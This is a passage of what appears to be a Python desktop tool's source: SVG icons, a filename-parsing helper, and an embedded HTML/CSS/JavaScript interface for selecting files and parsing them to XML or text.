<path fill="#92999c" d="M10 7v1h5V7h-5zm0 2v1h3V9h-3zm-2 2v1h8v-1H8zm0 2v1h4v-1H8zm0 2v1h5v-1H8z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
<path fill="#c94f53" d="M9 10V6H3v4zM5 8L4 9V7h4v1z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
</svg>
"""
ico_failed = """ <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
<path fill="#f3f3f2" d="M8.3 3L3 8.3v7.4L8.3 21h7.4l5.3-5.3V8.3L15.7 3H8.3z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
<path fill="#c94f53" d="M8.7 4L4 8.7v6.6L8.7 20h6.6l4.7-4.7V8.7L15.3 4H8.7zM9 5h5.8L19 9.1v5.8L14.9 19H9.1L5 14.9V9.1L9.1 5z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
<path fill="#c94f53" d="M9.2 7.8L7.8 9.2l2.8 2.8-2.8 2.8 1.4 1.4 2.8-2.8 2.8 2.8 1.4-1.4-2.8-2.8 2.8-2.8-1.4-1.4-2.8 2.8-2.8-2.8z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
</svg> """
ico_splash = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 100 100">
<defs>
<linearGradient id="b">
<stop offset="0" stop-color="#a4b1b6" stop-opacity=".3"></stop>
<stop offset="1" stop-color="#a4b1b6" stop-opacity="0"></stop>
</linearGradient>
<linearGradient id="a">
<stop offset="0" stop-color="#5a6b74"></stop>
<stop offset="1" stop-color="#697f8a"></stop>
</linearGradient>
<linearGradient id="f" x1="49.6" x2="23.5" y1="63.6" y2="37.5" gradientTransform="translate(-1 18)" gradientUnits="userSpaceOnUse" xlink:href="#a"></linearGradient>
<linearGradient id="g" x1="94" x2="38.1" y1="63" y2="7.1" gradientTransform="translate(0 3)" gradientUnits="userSpaceOnUse" xlink:href="#a"></linearGradient>
<linearGradient id="e" x1="33" x2="16.7" y1="68" y2="51.7" gradientTransform="translate(-1 13)" gradientUnits="userSpaceOnUse" xlink:href="#a"></linearGradient>
<linearGradient id="d" x1="85" x2="15" y1="85" y2="15" gradientUnits="userSpaceOnUse" xlink:href="#a"></linearGradient>
<linearGradient id="h" x1="85" x2="15" y1="85" y2="15" gradientUnits="userSpaceOnUse" xlink:href="#a"></linearGradient>
<linearGradient id="i" x1="65.5" x2="47.5" y1="70" y2="52" gradientUnits="userSpaceOnUse" xlink:href="#b"></linearGradient>
<linearGradient id="c" x1="85" x2="15" y1="85" y2="15" gradientUnits="userSpaceOnUse" xlink:href="#a"></linearGradient>
</defs>
<path fill="url(#c)" d="M85 50a35 35 0 0 1-35 35 35 35 0 0 1-35-35 35 35 0 0 1 34.9-35A35 35 0 0 1 85 49.9" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path><g class="svg_t t_1" color="#000">
<path fill="url(#e)" d="M32 69a12 12 0 0 1-12 12A12 12 0 0 1 8 69a12 12 0 0 1 12-12 12 12 0 0 1 12 12" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="url(#f)" d="M60 73a20 20 0 0 1-20 20 20 20 0 0 1-20-20 20 20 0 0 1 20-20 20 20 0 0 1 20 20" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
</g>
<path class="svg_t t_2" fill="url(#g)" d="M94 50a16 16 0 0 1-16 16 16 16 0 0 1-16-16 16 16 0 0 1 16-16 16 16 0 0 1 16 16" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path class="svg_t t_3" fill="url(#h)" d="M58 19a12 12 0 0 1-12 12 12 12 0 0 1-12-12A12 12 0 0 1 45.8 7a12 12 0 0 1 12 11.9" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<g fill="#f3f3f2" color="#000" class="svg_l t_1">
<rect width="3" height="1" x="16" y="45" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="5" height="1" x="14" y="43" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="3" height="1" x="17" y="47" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="3" height="1" x="21" y="47" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="7" height="1" x="9" y="47" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="3" height="1" x="8" y="49" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="9" height="1" x="12" y="49" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="2" height="1" x="22" y="49" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="4" height="1" x="10" y="51" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="2" height="1" x="16" y="51" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
</g>
<g fill="#f3f3f2" color="#000" class="svg_l t_2">
<rect width="7" height="1" x="65" y="20" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="2" height="1" x="73" y="20" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="7" height="1" x="62" y="22" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="4" height="1" x="70" y="22" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="3" height="1" x="64" y="24" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="4" height="1" x="68" y="24" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="2" height="1" x="73" y="24" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="6" height="1" x="69" y="26" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="2" height="1" x="66" y="26" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="8" height="1" x="57" y="26" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
</g>
<g color="#000">
<path fill="#f3f3f2" d="M40 33a3 3 0 0 0-3 3v28a3 3 0 0 0 3 3h17a2 2 0 0 0 1.4-.6l8-8A2 2 0 0 0 67 57V36a3 3 0 0 0-3-3H40z" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="url(#i)" d="M40 34a2 2 0 0 0-2 2v28c0 1.1.9 2 2 2h17l9-9V36a2 2 0 0 0-2-2z" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="#fff" fill-opacity=".5" d="M51 34L38 47v2l15-15zM54 34L38 50v4l20-20zM60 35L38 57v7l2 2h1l25-25v-5l-1-1z" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="#a4b1b6" d="M40 34a2 2 0 0 0-2 2v28c0 1.1.9 2 2 2h17v-1H40a1 1 0 0 1-1-1V36c0-.6.4-1 1-1h24c.6 0 1 .4 1 1v21h1V36a2 2 0 0 0-2-2H40z" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="#a4b1b6" fill-opacity=".5" d="M58 56a2 2 0 0 0-2 2v6a2 2 0 0 0 1.2 1.8l8.6-8.6A2 2 0 0 0 64 56h-6z" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<path fill="#a4b1b6" d="M58 56a2 2 0 0 0-2 2v8h1a1 1 0 0 0 .7-.3l8-8a1 1 0 0 0 .3-.7v-1h-8zm0 1h7l-8 8v-7c0-.6.4-1 1-1z" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<rect width="10" height="1" x="48" y="40" fill="#92999c" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="6" height="1" x="48" y="44" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="16" height="1" x="44" y="48" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="8" height="1" x="44" y="52" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="10" height="1" x="44" y="56" fill="#92999c" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="14" height="10" x="33" y="37" fill="#f3f3f2" overflow="visible" ry="2" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="12" height="8" x="34" y="38" fill="#c94f53" overflow="visible" ry="1" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="8" height="2" x="36" y="40" fill="#f3f3f2" overflow="visible" ry="0" style="isolation:auto;mix-blend-mode:normal"></rect>
<path fill="#f3f3f2" d="M36 41v3l2-2v-1z" overflow="visible" style="isolation:auto;mix-blend-mode:normal"></path>
<rect width="4" height="1" x="48" y="42" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="8" height="1" x="53" y="42" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="2" height="1" x="55" y="44" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="8" height="1" x="48" y="46" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="5" height="1" x="44" y="50" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="3" height="1" x="50" y="50" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="4" height="1" x="53" y="52" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="3" height="1" x="44" y="54" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="7" height="1" x="48" y="54" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="4" height="1" x="44" y="58" fill="#92999c" overflow="visible" rx=".5" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
</g>
<g fill="#f3f3f2" color="#000" class="svg_l t_3">
<rect width="5" height="1" x="67" y="72" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="3" height="1" x="73" y="72" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="2.8" height="1" x="67.2" y="74" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="4" height="1" x="71" y="74" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="7" height="1" x="67" y="76" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="4" height="1" x="75" y="76" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="2" height="1" x="68" y="78" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="5" height="1" x="71" y="78" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="4" height="1" x="67" y="80" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
<rect width="6" height="1" x="72" y="80" overflow="visible" ry=".5" style="isolation:auto;mix-blend-mode:normal"></rect>
</g>
</svg>
"""
def file_name(g):
f = ''.join(g.split('/')[-1:])
if('_' in f):
_f = f.split('_')
f0 = _f[0] if len(_f)>0 else ''
try:
m_year = re.match(r'.*([1-3][0-9]{3})', f)
f1 = m_year.group(1)
except:
f1 = '?'
f2 = _f[2] if len(_f)>2 else ''
else:
if('-' in f):
_f = f.split('-')
f0 = _f[0] if len(_f)>0 else ''
f1 = _f[1] if len(_f)>1 else ''
f2 = _f[2] if len(_f)>2 else ''
else:
f0 = '?'
try:
m_year = re.match(r'.*([1-2][0-9]{3})', f)
f1 = m_year.group(1)
except:
f1 = '?'
f2 = ''
return [f, f0, f1, f2]
HTML_code = """
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<style type="text/css">
.window { background: #F3F3F2; height: 100%; display: flex; flex-direction: column; transition: .2s all ease-in-out;}
body { margin: 0; background: #F3F3F2; height: 100%;}
.toolbar{ display: -webkit-flex; display: -ms-flexbox; display: flex;
-webkit-flex-wrap: nowrap; -ms-flex-wrap: nowrap; flex-wrap: nowrap;
box-sizing: border-box; padding-left: 8px; max-height: 80px; margin-bottom:
0px; min-height: 56px; z-index: 2; background: #F3F3F2;}
.button { color: #424242; text-decoration: none; margin: 0; font-size: 14px;
font-weight: 400; letter-spacing: 0; opacity: .87;
line-height: 0px; padding: 0 24px; transition: .2s all ease-in-out;
padding: 8px; max-height: 64px; overflow: hidden;
border: 0; border-radius: 32px; margin: 8px 4px; box-shadow: inset 0 0 0 1px #697F8A;
background: transparent; min-width: 40px;}
.button span { display: block; text-align: center; }
.button:focus {outline: none;}
.button:hover { background: rgba(105, 127, 138, .3); cursor: pointer; transition: .2s all
ease-in-out; box-shadow: inset 0 0 64px 32px rgba(105, 127, 138, .3); outline:none;}
.list { margin: 8px; background: #1E1E21; color: #eee; margin-top: 0;
flex-grow: 1; overflow: visible; overflow-x: hidden; overflow-y: auto;}
.files { padding: 0; margin: 0; padding-bottom: 8px;}
.status { margin: 8px 16px; }
.ico { width: 24px; height: 24px; }
li.fhead { background: #2F2F34; display: flex; }
.tb-e { padding: 8px 0; min-width: 7em; overflow: hidden; text-overflow:
ellipsis;}
.tb-g { width: 100%;}
.tb1 {width: 40px; overflow: hidden; text-overflow: ellipsis; padding-left:
8px; min-width: 40px;}
input[type="checkbox"]:hover { cursor: pointer; }
.sep { width: 1px; background: #5E6063; margin: 12px 8px; opacity: .8; }
h1.big { line-height: 16px; font-weight: lighter; color: #5E6063; }
li.file { padding-left: 8px; display: flex;}
button:disabled:hover, button[disabled]:hover { box-shadow: inset 0 0 0 1px
#697F8A; background: inherit; cursor: default; }
button:disabled, button[disabled] { opacity: .5; }
body,html { font-family: Arial; font-size: 11pt; height: 100%; overflow: hidden;}
div.msg { margin: 0.2em; line-height: 1.4em; }
#XoT.act { box-shadow: inset 0 0 0 2px #C94F53; }
#XoT.act .b-red{ fill: #C94F53 !important; }
#XoT.act:hover { background: rgba(201, 79, 83, .3); }
.tb-e.tb1 input { padding: 0; margin: 0; margin-left: 4px; }
b { background: #ccc; font-weight: bold; font-size: 10pt;
padding: 0.1em 0.2em; }
b.Python { background: #eee; }
i { font-family: Courier new; font-size: 10pt; border: #eee 1px solid;
padding: 0.1em 0.2em; }
.left { float: right; margin-left: auto; margin-right: 4px; }
.reduced .left { opacity: 0; }
.settings { -ms-flex-direction: column; -webkit-box-direction: normal;
-webkit-box-orient: vertical; bottom: 0; display: -webkit-box; display:
-ms-flexbox; display: flex; flex-direction: column; left: 0; position:
absolute; right: 0; top: 0; background: #F3F3F2; z-index: -1; transition: .2s all ease-in-out;
opacity: 0; flex-direction: row; transform: scale(1.2) translateZ(0px);
transition: .2s all ease-in-out; display: none;}
.settings.visible {z-index: 1; animation: pop 0.3s 0s ease-in-out 1 forwards; display: flex;}
.button.fixed { width: 40px; height: 40px; right: 4px; top: 4px; position:
absolute; z-index: 99;}
.settings .pane { -webkit-box-flex: 1; -webkit-box-pack: end; display:
-webkit-box; display: -ms-flexbox; display: flex; justify-content: flex-end;
z-index: 1;}
.panels-menu li:hover { cursor: pointer; background: rgba(243, 243, 242,
.1); transition: .2s all ease-in-out; }
.panels-menu li { transition: .2s all ease-in-out; border-left: 0px; margin: 0 1rem; border-radius: .3rem;}
.p0 { flex: 1 0 218px; background: #2F2F34; color: rgba(255,255,255,.8);
font-size: 1.12em;}
.p1 { flex: 1 1 800px; }
ul.panels-menu { margin-bottom: 0; padding-left: 0; list-style: none;
position: relative; min-width: 15em; max-width: 20em; margin-top: 3em;}
.panels-content { padding: 0px 40px; width: 100%; color:
#5E6063; display: none; margin-right: 54px;}
.panels-content.active { display: block; overflow-x: auto;}
.pane-title { font-size: 1.75em; font-weight: bold; line-height: 1;
margin-bottom: .75em; margin-top: 2.5em; color: #2F2F34; }
#console { max-height: 8rem; overflow-wrap: normal; overflow-y: auto; padding: 0 8px;}
.msg:before { content: ''; width: 8px; background: rgba(105, 127, 138,
.3); display: inline-block; height: 8px; margin-right: 8px; border-radius:
8px; }
.checkb { vertical-align: middle; -webkit-appearance: none; display:
inline-block; position: relative; width: 16px; height: 16px; font-size: inherit;
border-radius: 3px; background-color: #c2c5c9; transition: background-color
0.16s cubic-bezier(0.5, 0.15, 0.2, 1); margin: 4px 0 0; margin-top: 1px \9;
line-height: normal; }
input[type="checkbox"]:active, input[type="checkbox"]:checked {
background-color: #303f46; } input[type="checkbox"]:after { width: 10.56px;
margin: -1px; transform: translate3d(0, 0, 0) rotate(-45deg) scale(0);
transition-delay: .05s; } input[type="checkbox"]:before { width: 5.28px;
transform: translate3d(0, 0, 0) rotate(225deg) scale(0); }
input[type="checkbox"]:before, input[type="checkbox"]:after { content: "";
position: absolute; top: 12px; left: 6.4px; height: 2px; border-radius: 1px;
background-color: #e8eaed; transform-origin: 0 0; opacity: 0; transition:
transform 0.1s cubic-bezier(0.5, 0.15, 0.2, 1), opacity 0.1s cubic-bezier(0.5,
0.15, 0.2, 1); }
input[type="checkbox"]:checked:after { opacity: 1; transform: translate3d(0, 0,
0) rotate(-45deg) scale(1); transition-delay: 0; }
input[type="checkbox"]:checked:before { opacity: 1; transform: translate3d(0, 0,
0) rotate(225deg) scale(1); transition-delay: .05s; }
input[type="checkbox"]:before, input[type="checkbox"]:after { background-color:
#fff; }
input[type="checkbox"]:active, input[type="checkbox"]:focus { outline: none; }
h4.small-title { margin-bottom: .25rem; font-size: 1.2em; }
span.muted { opacity: .8; display: block;}
input.input-text { border: none; background-color: rgba(0,0,0,.1); border-color:
rgba(0,0,0,.3); height: 32px; padding: 10px; -webkit-box-sizing: border-box;
-webkit-transition: background-color .15s ease,border .15s ease; border-radius:
3px; border-style: solid; border-width: 1px; box-sizing: border-box; width:
100%; line-height: 32px; color: #222; margin-top: .75em; transition: .2s all
ease-in-out; }
input.input-text:focus { outline: none; box-shadow: 0 0 0 2px rgba(0,0,0,.2); }
.btn { height: initial; padding: 0 0.8em; font-size: 1em; line-height: 2em;
display: inline-block; margin-bottom: 0; font-weight: normal; text-align:
center; vertical-align: middle; border: none; border-radius: 3px;
background-color: #f3f4f6; white-space: nowrap; cursor: pointer; z-index: 0;
-webkit-user-select: none; width: 7em;}
.pane-block.fixed { position: absolute; right: 3em; bottom: 3em; }
.btn-save { font-size: 1.2em; padding: .2em .5em; }
.btn-cancel { font-size: 1.2em; padding: .2em .5em; }
.btn:active, .btn:focus { box-shadow: inset 0 0 0 1px #697F8A, 0 0 0 2px
rgba(0,0,0,.2); }
.khead { border-bottom: 2px solid rgba(0,0,0,0.1); display: flex;
font-weight: bold; }
.keys { padding: 0; margin: 0; padding-bottom: 8px; }
li.key { padding-left: 8px; display: flex; border-bottom: 1px solid rgba(0,0,0,0.1);}
li.key:last-child { border: none; }
span.about-title { font-size: 3rem; font-weight: 600; line-height: 4rem;
margin-bottom: .75em; color: #2F2F34; display: flex;
text-align: center; margin: 0 auto; margin-left: auto; width:
fit-content; eight: 4rem; transition: .2s all ease-in-out; transform:
scale3d(1, 1, 1); margin-top: 1.5em;}
.about-title .ico { width: 4rem; height: 4rem; }
span.about-version { text-align: center; width: 100%; margin: 0 auto;
margin-bottom: .25rem; font-size: 1.6rem; font-weight: 200; display: flex;
flex-grow: 1; flex-direction: column-reverse; }
span.about-title:hover { transform: scale3d(1.1, 1.1, 1.1); transition: .2s
all ease-in-out; text-shadow: 2px 2px 0px #F3F3F2, 4px 4px 2px rgba(164,
177, 182, 0.6); }
::-webkit-scrollbar { height: 14px; width: 14px; border-color: #F3F3F2; }
::-webkit-scrollbar-thumb { background-clip: padding-box; border-radius: 7px;
border-color: #F3F3F2; background-color: rgba(66, 66, 66, 0.8); border-style:
solid; border-width: 3px; } ::-webkit-scrollbar-track { background-clip:
padding-box; border-radius: 8px; border-color: #F3F3F2; background-color:
rgba(66, 66, 66, .12); border-style: solid; border-width: 2px; }
::-webkit-scrollbar-track { border-width: initial }
::-webkit-scrollbar-corner { background-color: transparent }
.list::-webkit-scrollbar { height: 14px; width: 14px; border-color: #1E1E21; }
.list::-webkit-scrollbar-thumb { background-clip: padding-box; border-radius: 7px;
border-color: #1E1E21; background-color: #c2c5c9; border-style:
solid; border-width: 3px; }
.list::-webkit-scrollbar-track { background-clip:
padding-box; border-radius: 8px; border-color: #1E1E21; background-color:
#2F2F34; border-style: solid; border-width: 2px; }
.markup { font-size: 0.9375rem; word-wrap: break-word; margin: 0; padding: 0; }
pre { background: rgba(47, 47, 52, .9); display: flex; }
.markup pre { border-radius: 5px; box-sizing: border-box; font-family:
Consolas,Liberation Mono,Menlo,Courier,monospace; max-width: 90%; white-space:
pre-wrap; line-height: 1.3; user-select: text; padding: .5rem; }
code { margin: 0; padding: 0; display: flex; }
.tag .name {color: #e06c75;}
.xml { color: #abb2bf; flex-direction: column;}
.text { color: #abb2bf; flex-direction: column;}
.sub { padding-left: 1em; }
.splash { display: initial; text-align: center; bottom: 0; height:
max-content; left: 0; margin: auto; position: absolute; right: 0; top: 0;
max-width: 430px; }
.splash svg {max-height: 400px;}
.splash span {line-height: 0; font-size: 2em; color: #a4b1b6;}
.svg_t {animation-direction: alternate;animation-duration: 1.5s;animation-iteration-count: infinite;animation-name: float-landing;animation-timing-function: ease-in-out;}
.svg_l { animation-direction: alternate; animation-duration: 2s;
animation-iteration-count: infinite; animation-name: text-landing;
animation-timing-function: ease-in-out; }
@keyframes float-landing { 0% { -webkit-transform: translate3d(0,-2px,0);
transform: translate3d(0,-2px,0) }
to { -webkit-transform: translate3d(0,2px,0); transform: translate3d(0,2px,0) } }
@keyframes text-landing { 0% { opacity: 0.1; }
to { opacity: 1; } }
.t_3 { animation-delay: .4s; }
.t_2 { animation-delay: .6s; }
.panels-menu li a { padding: 0.75em 1.5em; transition: .2s all ease-in-out;
display: block; margin-bottom: .5em;}
.panels-menu li.selected{ border-left: 4px solid; border-color: #F3F3F2;
background: rgba(0,0,0,0.2); border-radius: .3rem; margin: 0 1rem;}
.reduced {transform: scale(.9) translateZ(0px); }
.grow {transform: scale(.9) translateZ(0px);opacity: 0; transition: .2s all ease-in-out; }
.animated { animation: show 0.3s 0.25s ease-in-out 1 forwards; opacity: 0;
transform: translate(4em, 0); transition: height 2s ease-in-out; overflow: hidden; max-width: 90%;}
.animated:nth-child(1) {animation-delay: .2s;}
.animated:nth-child(2) {animation-delay: .3s;}
.animated:nth-child(3) {animation-delay: .4s;}
.animated:nth-child(4) {animation-delay: .5s;}
.animated:nth-child(5) {animation-delay: .6s;}
.animated:nth-child(6) {animation-delay: .7s;}
.animated:nth-child(7) {animation-delay: .8s;}
.animated:nth-child(8) {animation-delay: .9s;}
.animated:nth-child(9) {animation-delay: 1s;}
.animated:nth-child(10) {animation-delay: 1.1s;}
.animated:nth-child(11) {animation-delay: 1.2s;}
.animated:nth-child(12) {animation-delay: 1.3s;}
.animated:nth-child(13) {animation-delay: 1.4s;}
@keyframes show { 100% { opacity: 1; transform: translate(0,0); max-width:
100%; } }
@keyframes pop { 100% { opacity: 1; transform: scale(1) translateZ(0px); max-width:
100%; } }
</style>
<script>
var XML = false;
var timeout;
var T = true;
document.onkeydown = checkKey;
function stageAll() {
var inp = document.getElementsByClassName("checkb");
for (var i = 0; i < inp.length; i++)
if (inp[i].type == "checkbox") {
if(! inp[i].checked) {
inp[i].checked = true;
addFile(inp[i].value);
}
}
}
function anyChecked() {
var inp = document.getElementsByClassName("checkb");
for (var i = 0; i < inp.length; i++)
if (inp[i].type == "checkbox")
if (inp[i].checked)
return true;
return false;
}
function js_alert(msg) {
alert(msg);
}
function flsSet(html) {
var elem = document.querySelector('#fls');
elem.innerHTML = html;
}
function flsAdd(html) {
var elem = document.querySelector('#fls');
elem.innerHTML += html;
}
function js_print(lang, event, msg) {
msg = "<b class="+lang+">"+lang+": "+event+":</b> " + msg;
console = document.getElementById("console")
console.innerHTML += "<div class=msg>"+msg+"</div>";
}
function js_callback_1(ret) {
js_print("Javascript", "html_to_data_uri", ret);
}
function js_callback_2(msg, py_callback) {
js_print("Javascript", "js_callback", msg);
py_callback("String sent from Javascript");
}
function setPane(pane) {
document.querySelector(".selected").classList.remove("selected");
document.querySelector(".l"+pane).classList.add("selected");
document.querySelector(".active").classList.remove("active");
document.querySelector("#"+pane).classList.add("active");
}
function setCount(cnt) {
document.querySelector("#fcount").innerHTML = cnt+' Items';
}
function menu() {
if(document.querySelector(".window").classList.contains('reduced')) {
//open
document.querySelector(".settings").classList.remove("visible");
} else {
document.querySelector(".settings").classList.add("visible");
}
document.querySelector(".window").classList.toggle('reduced');
}
function plop(msg) {
console = document.getElementById("console");
console.innerHTML += "<div class=msg>"+msg+"</div>";
//lol(msg);
}
function log(msg) {
console = document.getElementById("console");
console.innerHTML += "<div class=msg>"+msg+"</div>";
}
function addFile(f) {
//console = document.getElementById("console");
//console.innerHTML += "<div class=msg>"+f+"</div>";
switch_file(f);
}
function XoT() {
XML = !XML;
var elem = document.querySelector('#XoT');
elem.classList.toggle("act");
}
function parseF() {
if(anyChecked()) {
var elem = document.querySelector('#fls');
elem.innerHTML = "<h4 class='status'>Working . . .</h4>";
document.getElementById("add").disabled = true;
document.getElementById("start").disabled = true;
document.getElementById("XoT").disabled = true;
parse(js_callback_1, XML);
} else {
log('Please select at least one file.');
}
}
function resetT() {
T = true;
}
function checkKey(e) {
e = e || window.event;
if(document.activeElement.tagName == "INPUT") {
if (e.keyCode == '27') {
document.activeElement.blur();
}
} else if (document.activeElement.tagName == "BODY") {
if (e.keyCode == '38') {
// up arrow
}
else if (e.keyCode == '83') {
// s
if(T) {
if(! document.querySelector(".settings").classList.contains("visible")) {
stageAll();
T = false;
timeout = setTimeout(resetT, 750);
} else {
setPane('Struc');
T = false;
timeout = setTimeout(resetT, 300);
}
}
}
else if (e.keyCode == '82') {
// r
if(T) {
if(! document.querySelector(".settings").classList.contains("visible")) {
refresh(js_callback_1);
enable();
T = false;
timeout = setTimeout(resetT, 750);
}
}
}
else if (e.keyCode == '88') {
// x
if(T) {
if(! document.querySelector(".settings").classList.contains("visible")) {
if(! document.getElementById("XoT").disabled) XoT();
T = false;
timeout = setTimeout(resetT, 750);
}
}
}
else if (e.keyCode == '13') {
if(T) {
if(document.querySelector(".settings").classList.contains("visible")) {
save();
} else {
parseF();
}
T = false;
timeout = setTimeout(resetT, 750);
}
// Enter
}
else if (e.keyCode == '32') {
// Space
}
else if (e.keyCode == '67') {
// c
if(T) {
if(document.querySelector(".settings").classList.contains("visible")) {
setPane('Core');
T = false;
timeout = setTimeout(resetT, 300);
}
}
}
else if (e.keyCode == '75') {
// k
if(T) {
if(document.querySelector(".settings").classList.contains("visible")) {
setPane('Keys');
T = false;
timeout = setTimeout(resetT, 300);
}
}
}
else if (e.keyCode == '65') {
// a
if(T) {
if(document.querySelector(".settings").classList.contains("visible")) {
setPane('About');
T = false;
timeout = setTimeout(resetT, 300);
}
}
}
else if (e.keyCode == '84') {
// t
}
else if (e.keyCode == '27') {
if(document.querySelector(".settings").classList.contains("visible")) {
menu();
}
// Esc
}
else if (e.keyCode == '188') {
if(T) {
menu();
T = false;
timeout = setTimeout(resetT, 750)
}
// ,
}
else if (e.keyCode == '191') {
// /
}
}
}
function enable() {
document.querySelector("input[name='path']").blur();
document.querySelector("input[name='out']").blur();
document.getElementById("add").disabled = false;
document.getElementById("start").disabled = false;
document.getElementById("XoT").disabled = false;
}
window.onload = function(){
html_to_data_uri("test", js_callback_1);
};
</script>
</head>
<body>
<div class="window">
<div class="toolbar">
<button id="add" class="button" onclick="lol('btn')">
<svg class="ico" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
<path style="isolation:auto;mix-blend-mode:normal" fill="#303f46" d="M12 11l-1 1v9h2v-8h8v-2z" color="#000" overflow="visible"/>
<path style="isolation:auto;mix-blend-mode:normal" fill="#546e7a" d="M11 13l2-2V3h-2v8H3v2h8z" color="#000" overflow="visible"/>
</svg>
</button>
<!--button class="button" onclick="plop('btn')">plop</button-->
<button id="start" class="button" onclick="parseF()">
<svg class="ico" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
<path fill="#546e7a" d="M8 5l12 7-12 7z" color="#000" overflow="visible" style="isolation:auto;mix-blend-mode:normal"/>
<path fill="#303f46" fill-rule="evenodd" d="M7 4l14 8-14 8zm1 2v12l4-6z"/>
</svg>
</button>
<button id="XoT" class="button" onclick="XoT()">
<svg class="ico" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
<path style="isolation:auto;mix-blend-mode:normal" fill="#546e7a" d="M5 4v1h13v7h1V4H5zm0 7v9h12v-1H6v-8H5z" color="#000" overflow="visible"/>
<path style="isolation:auto;mix-blend-mode:normal" class="b-red" fill="#303f46" d="M18.5 13l-.7.7L20 16H15v1h5.1l-2.3 2.3.7.8 2.8-2.9.7-.7-3.5-3.5z" color="#000" overflow="visible"/>
